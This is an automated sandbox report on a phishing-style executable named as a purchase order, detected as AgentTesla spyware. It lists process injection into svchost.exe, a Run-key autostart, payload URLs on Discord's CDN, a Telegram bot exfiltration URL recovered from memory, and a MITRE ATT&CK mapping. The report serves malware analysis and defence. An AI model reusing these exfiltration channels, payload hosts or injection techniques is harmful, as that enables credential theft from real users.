                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6490000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 64A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 64B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6600000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6610000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6620000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6630000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6640000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6650000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6660000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6800000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6810000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6820000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6830000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6840000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6850000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6860000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6870000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6880000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6890000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6900000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6910000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6920000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6930000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6940000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6950000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6960000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6970000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6980000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6990000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 50480000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' 'Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' 'Jump to behavior
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_504853B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_5048A014
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_504854C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_50485CC4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,GetACP,5_2_5048B490
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_50489FC8
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: GetLocaleInfoA,11_2_004179E0
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50488A9C GetLocalTime,5_2_50488A9C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DBD8A GetUserNameW,11_2_020DBD8A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50485D8D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,5_2_50485D8D
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401980
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401EB6 _memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,11_2_00401EB6

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Access Token Manipulation1Disable or Modify Tools11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection412Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API11Logon Script (Windows)Registry Run Keys / Startup Folder1Scripting1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery126Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery251VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncVirtualization/Sandbox Evasion14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 324078 Sample: New Order PO20011046.exe Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 39 Multi AV Scanner detection for submitted file 2->39 41 Detected unpacking (changes PE section rights) 2->41 43 Detected unpacking (overwrites its own PE header) 2->43 45 7 other signatures 2->45 8 New Order PO20011046.exe 1 2 2->8         started        13 Evvudrv.exe 2->13         started        15 Evvudrv.exe 2->15         started        process3 dnsIp4 31 discord.com 162.159.128.233, 443, 49731, 49761 CLOUDFLARENETUS United States 8->31 33 cdn.discordapp.com 162.159.135.233, 443, 49732 CLOUDFLARENETUS United States 8->33 29 C:\Users\user\AppData\Local\...vvudrv.exe, PE32 8->29 dropped 47 Writes to foreign memory regions 8->47 49 Allocates memory in foreign processes 8->49 51 Creates a thread in another existing process (thread injection) 8->51 53 Injects a PE file into a foreign processes 8->53 17 svchost.exe 5 8->17         started        19 New Order PO20011046.exe 6 8->19         started        35 162.159.130.233, 443, 49755, 49762 CLOUDFLARENETUS United States 13->35 37 162.159.136.232, 443, 49754 CLOUDFLARENETUS United States 13->37 55 Multi AV Scanner detection for dropped file 13->55 57 Machine Learning detection for dropped file 13->57 file5 signatures6 process7 process8 21 cmd.exe 1 17->21         started        23 cmd.exe 1 17->23         started        process9 25 conhost.exe 21->25         started        27 conhost.exe 23->27         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    New Order PO20011046.exe33%VirustotalBrowse
                    New Order PO20011046.exe69%ReversingLabsWin32.Spyware.Woreflint
                    New Order PO20011046.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe69%ReversingLabsWin32.Spyware.Woreflint

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    5.2.svchost.exe.50480000.2.unpack100%AviraHEUR/AGEN.1108767Download File
                    18.2.Evvudrv.exe.400000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                    18.2.Evvudrv.exe.2f60000.3.unpack100%AviraHEUR/AGEN.1108768Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    discord.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    http://hltGXE.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://discord.com/J0%Avira URL Cloudsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    discord.com
                    		162.159.128.233
                    		truefalseunknown
                    cdn.discordapp.com
                    		162.159.135.233
                    		truefalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/EvvuredEvvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                        		high
                        https://discord.com/Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://hltGXE.comNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                          		high
                          https://discord.com/JEvvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.orgGETMozilla/5.0New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          162.159.136.232
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.130.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.128.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.135.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:324078
                          Start date:28.11.2020
                          Start time:10:26:47
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 40s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:New Order PO20011046.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@15/7@6/4
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 56.3% (good quality ratio 54.9%)
                          • Quality average: 85.6%
                          • Quality standard deviation: 23.6%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 216
                          • Number of non-executed functions: 48
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 51.104.144.132, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 51.104.146.109
                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:27:37API Interceptor334x Sleep call for process: New Order PO20011046.exe modified
                          10:28:27API Interceptor1x Sleep call for process: svchost.exe modified
                          10:28:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:36API Interceptor4x Sleep call for process: Evvudrv.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          162.159.136.23211-27.exeGet hashmaliciousBrowse
                            STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                              XcOxlmOz4D.exeGet hashmaliciousBrowse
                                fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                  SpecificationX20202611.xlsxGet hashmaliciousBrowse
                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                      tzjEwwwbqK.exeGet hashmaliciousBrowse
                                        New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                          USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                            USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                              NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                  D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                    LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                      QgwtAnenic.exeGet hashmaliciousBrowse
                                                        qclepSi8m5.exeGet hashmaliciousBrowse
                                                          99GQMirv2r.exeGet hashmaliciousBrowse
                                                            7w6Yl263sM.exeGet hashmaliciousBrowse
                                                              8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                187QadygQl.exeGet hashmaliciousBrowse
                                                                  162.159.130.23311-27.exeGet hashmaliciousBrowse
                                                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                      Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                        tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                            oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                              d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                Order_Request_Retail_20-11691-AB.xlsxGet hashmaliciousBrowse
                                                                                  RBBD5vivZc.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Trojan.Siggen10.63473.17852.exeGet hashmaliciousBrowse
                                                                                      IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exeGet hashmaliciousBrowse
                                                                                        GuYXnzIH45.exeGet hashmaliciousBrowse
